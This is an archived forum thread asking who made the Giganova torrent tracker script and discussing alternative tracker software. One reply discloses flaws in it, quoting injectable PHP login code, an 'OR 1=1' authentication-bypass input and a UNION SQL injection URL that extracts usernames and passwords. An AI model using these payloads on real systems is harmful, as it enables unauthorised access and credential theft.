Bravo List - Who is the developer?

Bravo List (http://www.bvlist.com/index.php)

- Community Cafe (http://www.bvlist.com/forumdisplay.php?f=18)

- - Who is the developer? (http://www.bvlist.com/showthread.php?t=4514)

Who is the developer?

Who is the developer for Giganova Tracker Source? Any official web?:unknown:
Thanks :movie:

guibean made it for his site Giganova.org

but there is no support and there are xxs and sql injection in login.php

Auth bypass - login.php
Bug func:

Code:

  if (isset($_POST['username'])&&isset($_POST['password'])){ 

    $result = mysql_query("SELECT * FROM users WHERE username = '".$_POST['username']."' and password = '".md5($_POST['password'])."' LIMIT 1") or die (mysql_error()); 

    if (mysql_num_rows($result) == 0){ 

        stheader('Login Failed'); 

        login_form($_POST['username'],'Username or password incorrect.'); 

        footer(); 

        exit(); 

    }

Username: name' OR 1=1/*

Password: anything

Sql-inj - usertorrent.php
Bug func:

Code:

  $result2 = mysql_query("SELECT * FROM torrents LEFT JOIN categories ON torrents.subcat = categories.subid WHERE posted_by='".strtolower($_GET['usuario'])."'") or die (mysql_error());

Code:

usertorrent.php?usuario=giga'+union+select+1,2,3,4  ,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt(concat  _ws(0x3a,username,password),0x71),0x71),14,15,16,1  7,18,19,20,21,22+from+users/*

bugs & no support . what a pity, I was planning to use it on my site...
thank u 4 rep, Phogo :)

You could always fix the bugs, remove the login/registration function?

Wouldn't be that hard.

The only thing with a script that this is it uses a scrape to get the stats from the announce and more and more torrents are going trackerless it will be hard to populate the index

thank u 4 the suggestion, but files of a torrent can not be displayed on page is still a problem to me.
all I really want is a simple torrent indexer, like T-XORE, but badly the project seems stopped :( Any good advice plz, Phogo? Thanks :P

did u search the forum i think Txore source was sumvere here

There are many tracker sources that support external torrents, a few with some plugins too that can auto add torrents...

phpmybittorrent can handle external
xbtit can
some tbdev can
some yuna
my forum can ;)

just depends on what you want.

PM me if you would like some help

Quote:

Originally Posted by wolfman (Post 21030)

did u search the forum i think Txore source was sumvere here

Txore suffers the same exploits

Quote:

Originally Posted by wolfman (Post 21030)

did u search the forum i think Txore source was sumvere here

I did it, wolf, and I tried it before I posted this thread, but the admin panel is toooo weak... I don't think I like it...
But thanks anyway, wolf :)

hove about Torrent Hoster ??
i kinda like it but is for public tracker :coffee:

Quote:

Originally Posted by Phogo (Post 21031)

Thank you soooo much Phogo, I'll pm you later. I have lots of question to ask, haha :D